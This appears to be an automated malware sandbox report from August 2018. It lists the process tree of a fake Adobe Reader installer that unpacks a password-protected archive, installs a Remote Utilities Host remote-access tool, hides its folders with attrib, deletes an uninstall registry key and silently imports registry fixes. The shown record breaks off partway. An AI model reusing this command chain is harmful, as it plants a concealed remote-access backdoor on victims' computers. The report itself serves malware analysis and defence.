Commandline:	taskeng.exe {0EBC3A93-A818-47F5-837A-5A0A478FB651} S-1-5-21-290172400-2828352916-2832973385-1001:computer\user:Interactive:[1]
Imagebase:	0x1a0000
File size:	192000 bytes
MD5 hash:	4F2659160AFCCA990305816946F69407
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: CDaNsQ7Rrd.exe PID: 2404 Parent PID: 2644

General

Start time:	10:33:29
Start date:	30/08/2018
Path:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' AI_RESUME=1 ADDLOCAL=MainFeature,RequiredApplication PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' TARGETDIR='C:\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Imagebase:	0x200000
File size:	2523958 bytes
MD5 hash:	EDA8E4F2DF81E0BA5B88D73DE9779205
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: msiexec.exe PID: 2396 Parent PID: 2732

General

Start time:	10:33:30
Start date:	30/08/2018
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\MsiExec.exe -Embedding 2EDF85C04E0081D90ED7293C0FDDF85C C
Imagebase:	0x680000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: CDaNsQ7Rrd.exe PID: 2560 Parent PID: 2404

General

Start time:	10:33:32
Start date:	30/08/2018
Path:	C:\Users\user\Desktop\CDaNsQ7Rrd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\CDaNsQ7Rrd.exe' /i 'C:\Users\user\AppData\Roaming\Adobe\Adobe Reader 12.0.1\install\setup.msi' CHAINERUIPROCESSID='2404Chainer' EXECUTEACTION='INSTALL' SECONDSEQUENCE='1' CLIENTPROCESSID='2404' ADDLOCAL='MainFeature,RequiredApplication' ACTION='INSTALL' CLIENTUILEVEL='0' PRIMARYFOLDER='APPDIR' ROOTDRIVE='C:\' AI_PREREQFILES='C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe' AI_PREREQDIRS='C:\Users\user\AppData\Roaming\Adobe' AI_RESUME='1' TARGETDIR='C:\' AI_SETUPEXEPATH='C:\Users\user\Desktop\CDaNsQ7Rrd.exe' SETUPEXEDIR='C:\Users\user\Desktop\' APPDIR='C:\Program Files\Adobe\Adobe Reader\'
Imagebase:	0x200000
File size:	2523958 bytes
MD5 hash:	EDA8E4F2DF81E0BA5B88D73DE9779205
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: msiexec.exe PID: 2420 Parent PID: 2732

General

Start time:	10:33:33
Start date:	30/08/2018
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\MsiExec.exe -Embedding F7FCF8C7FA5995D0F2A8BA3C03B96EE9
Imagebase:	0x680000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: cmd.exe PID: 2724 Parent PID: 2496

General

Start time:	10:33:33
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\inst_fold\waitbefore.bat' '
Imagebase:	0x4a9c0000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: tasklist.exe PID: 2244 Parent PID: 2724

General

Start time:	10:33:34
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x530000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: find.exe PID: 2364 Parent PID: 2724

General

Start time:	10:33:34
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C '7zaa.exe'
Imagebase:	0xab0000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: tasklist.exe PID: 144 Parent PID: 2724

General

Start time:	10:33:37
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0x810000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: find.exe PID: 2148 Parent PID: 2724

General

Start time:	10:33:37
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'armstall.exe'
Imagebase:	0x9b0000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: tasklist.exe PID: 2312 Parent PID: 2724

General

Start time:	10:33:40
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist
Imagebase:	0xa50000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: find.exe PID: 2540 Parent PID: 2724

General

Start time:	10:33:40
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rutserv.exe'
Imagebase:	0xf90000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: 7zaa.exe PID: 2348 Parent PID: 2496

General

Start time:	10:33:42
Start date:	30/08/2018
Path:	C:\inst_fold\7zaa.exe
Wow64 process (32bit):	false
Commandline:	'C:\inst_fold\7zaa.exe' x -oC:\inst_fold -pdsiSDJJiojeflOSIOwp3#DSIJ23jeewE@_SDD_as2 C:\inst_fold\arm.7z
Imagebase:	0x400000
File size:	690688 bytes
MD5 hash:	0184E6EBE133EF41A8CC6EF98A263712
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: fp.exe PID: 2836 Parent PID: 2496

General

Start time:	10:33:46
Start date:	30/08/2018
Path:	C:\inst_fold\fp.exe
Wow64 process (32bit):	false
Commandline:	'C:\inst_fold\fp.exe'
Imagebase:	0x400000
File size:	12871506 bytes
MD5 hash:	ED9026A1C5658D79BB71CA1E30767517
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: armstart.exe PID: 2860 Parent PID: 2836

General

Start time:	10:33:50
Start date:	30/08/2018
Path:	C:\inst_fold\armstart.exe
Wow64 process (32bit):	false
Commandline:	'C:\inst_fold\armstart.exe'
Imagebase:	0x400000
File size:	12043479 bytes
MD5 hash:	6FBBD961882D7FB7FD1616B19CBB5814
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: installer.exe PID: 2912 Parent PID: 2860

General

Start time:	10:33:53
Start date:	30/08/2018
Path:	C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\7ZipSfx.000\installer.exe' /rsetup
Imagebase:	0x400000
File size:	9956368 bytes
MD5 hash:	3C5850EF227BB206E507551C471EE8DF
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low

Analysis Process: cmd.exe PID: 2948 Parent PID: 2836

General

Start time:	10:33:55
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armgrd.bat' '
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 2920 Parent PID: 2836

General

Start time:	10:33:55
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\inst_fold\armsettings.bat' '
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskkill.exe PID: 2984 Parent PID: 2948

General

Start time:	10:33:55
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x120000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: attrib.exe PID: 2952 Parent PID: 2920

General

Start time:	10:33:55
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host\.'
Imagebase:	0x3c0000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: taskkill.exe PID: 2336 Parent PID: 2948

General

Start time:	10:33:56
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x150000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: attrib.exe PID: 2572 Parent PID: 2920

General

Start time:	10:33:56
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +s +h 'C:\Program Files (x86)\Remote Utilities - Host'
Imagebase:	0x280000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: taskkill.exe PID: 2656 Parent PID: 2948

General

Start time:	10:33:56
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x760000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 2088 Parent PID: 2920

General

Start time:	10:33:57
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +s +h 'C:\Program Files\Remote Utilities - Host\.'
Imagebase:	0x2a0000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1232 Parent PID: 2948

General

Start time:	10:33:57
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xdd0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 3148 Parent PID: 2920

General

Start time:	10:33:57
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +s +h 'C:\Program Files\Remote Utilities - Host'
Imagebase:	0x2b0000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1868 Parent PID: 2948

General

Start time:	10:33:58
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x490000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 612 Parent PID: 2920

General

Start time:	10:33:58
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +s +h 'C:\inst_fold'
Imagebase:	0xa20000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3320 Parent PID: 2948

General

Start time:	10:33:59
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xea0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 3328 Parent PID: 2920

General

Start time:	10:33:59
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +s +h 'C:\inst_fold\armstatus.exe'
Imagebase:	0x620000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: armforce.exe PID: 1532 Parent PID: 1432

General

Start time:	10:34:00
Start date:	30/08/2018
Path:	C:\inst_fold\armforce.exe
Wow64 process (32bit):	false
Commandline:	'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat
Imagebase:	0x400000
File size:	1985564 bytes
MD5 hash:	9245B8EC3D40D640E5CF5183F49CE2F6
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: attrib.exe PID: 768 Parent PID: 2920

General

Start time:	10:34:00
Start date:	30/08/2018
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +s +h 'C:\inst_fold\armstart.exe'
Imagebase:	0xa50000
File size:	16384 bytes
MD5 hash:	459A5755AFBB1CB3E67CA4C1296599E3
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1164 Parent PID: 2948

General

Start time:	10:34:00
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xac0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 1032 Parent PID: 1532

General

Start time:	10:34:00
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c 'C:\inst_fold\armstatus.bat'
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: reg.exe PID: 1888 Parent PID: 2920

General

Start time:	10:34:01
Start date:	30/08/2018
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{E945283B-758C-4A40-B851-1066D0E49EA8} /f
Imagebase:	0x4c0000
File size:	62464 bytes
MD5 hash:	D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3228 Parent PID: 2948

General

Start time:	10:34:01
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x8c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 1928 Parent PID: 1032

General

Start time:	10:34:01
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0x780000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 3444 Parent PID: 2920

General

Start time:	10:34:01
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3
Imagebase:	0xb60000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 3500 Parent PID: 1032

General

Start time:	10:34:02
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0xb90000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3460 Parent PID: 2948

General

Start time:	10:34:02
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xa20000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3544 Parent PID: 2948

General

Start time:	10:34:03
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x3b0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3672 Parent PID: 2948

General

Start time:	10:34:04
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x2a0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1112 Parent PID: 2948

General

Start time:	10:34:04
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x360000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3744 Parent PID: 2948

General

Start time:	10:34:05
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xe60000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3776 Parent PID: 2948

General

Start time:	10:34:05
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x20000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: regedit.exe PID: 3848 Parent PID: 2920

General

Start time:	10:34:05
Start date:	30/08/2018
Path:	C:\Windows\regedit.exe
Wow64 process (32bit):	false
Commandline:	regedit /s 'C:\inst_fold\armfix.reg'
Imagebase:	0x950000
File size:	398336 bytes
MD5 hash:	8A4883F5E7AC37444F23279239553878
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 412 Parent PID: 2948

General

Start time:	10:34:06
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x5a0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: reg.exe PID: 268 Parent PID: 2920

General

Start time:	10:34:06
Start date:	30/08/2018
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg import 'C:\inst_fold\armfix.reg' /reg:64
Imagebase:	0xc80000
File size:	62464 bytes
MD5 hash:	D69A9ABBB0D795F21995C2F48C1EB560
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 1236 Parent PID: 1032

General

Start time:	10:34:06
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3 /nobreak
Imagebase:	0xaa0000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3812 Parent PID: 2948

General

Start time:	10:34:07
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x900000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 3820 Parent PID: 2920

General

Start time:	10:34:07
Start date:	30/08/2018
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3
Imagebase:	0xaa0000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1876 Parent PID: 2948

General

Start time:	10:34:07
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xb00000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 1068 Parent PID: 2948

General

Start time:	10:34:08
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xf60000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3112 Parent PID: 2948

General

Start time:	10:34:08
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x1c0000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3360 Parent PID: 2948

General

Start time:	10:34:09
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x430000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3908 Parent PID: 2948

General

Start time:	10:34:09
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0x330000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3880 Parent PID: 2948

General

Start time:	10:34:10
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xc90000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 1284 Parent PID: 1032

General

Start time:	10:34:10
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FI 'USERNAME eq user'
Imagebase:	0xad0000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: armforce.exe PID: 3988 Parent PID: 2836

General

Start time:	10:34:10
Start date:	30/08/2018
Path:	C:\inst_fold\armforce.exe
Wow64 process (32bit):	false
Commandline:	'C:\inst_fold\armforce.exe' C:\inst_fold\armstatus.bat
Imagebase:	0x400000
File size:	1985564 bytes
MD5 hash:	9245B8EC3D40D640E5CF5183F49CE2F6
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: cmd.exe PID: 3392 Parent PID: 3988

General

Start time:	10:34:12
Start date:	30/08/2018
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\cmd.exe' /c 'C:\inst_fold\armstatus.bat'
Imagebase:	0x4a950000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 3948 Parent PID: 2948

General

Start time:	10:34:12
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xa90000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: find.exe PID: 4012 Parent PID: 1032

General

Start time:	10:34:12
Start date:	30/08/2018
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /I /C 'rfusclient.exe'
Imagebase:	0xc30000
File size:	13824 bytes
MD5 hash:	5816034B0B629756163B80838853B730
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: tasklist.exe PID: 2200 Parent PID: 3392

General

Start time:	10:34:12
Start date:	30/08/2018
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0xad0000
File size:	80896 bytes
MD5 hash:	A9A00E71E3DD67B029FC904FE3BB61DA
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: armstatus.exe PID: 2256 Parent PID: 2836

General

Start time:	10:34:13
Start date:	30/08/2018
Path:	C:\inst_fold\armstatus.exe
Wow64 process (32bit):	false
Commandline:	'C:\inst_fold\armstatus.exe' 1 C:\inst_fold\armdaemon.js
Imagebase:	0x400000
File size:	1992906 bytes
MD5 hash:	536B8E509B970FFEBF115C66D6AF7E3C
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: taskkill.exe PID: 2264 Parent PID: 2948

General

Start time:	10:34:14
Start date:	30/08/2018
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Imagebase:	0xc80000
File size:	77824 bytes
MD5 hash:	94BDCAFBD584C979B385ADEE14B08AB4
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exe PID: 4092 Parent PID: 3988

General

Start time:	10:34:14
Start date:	30/08/2018
Path:	C:\Windows\explorer.exe
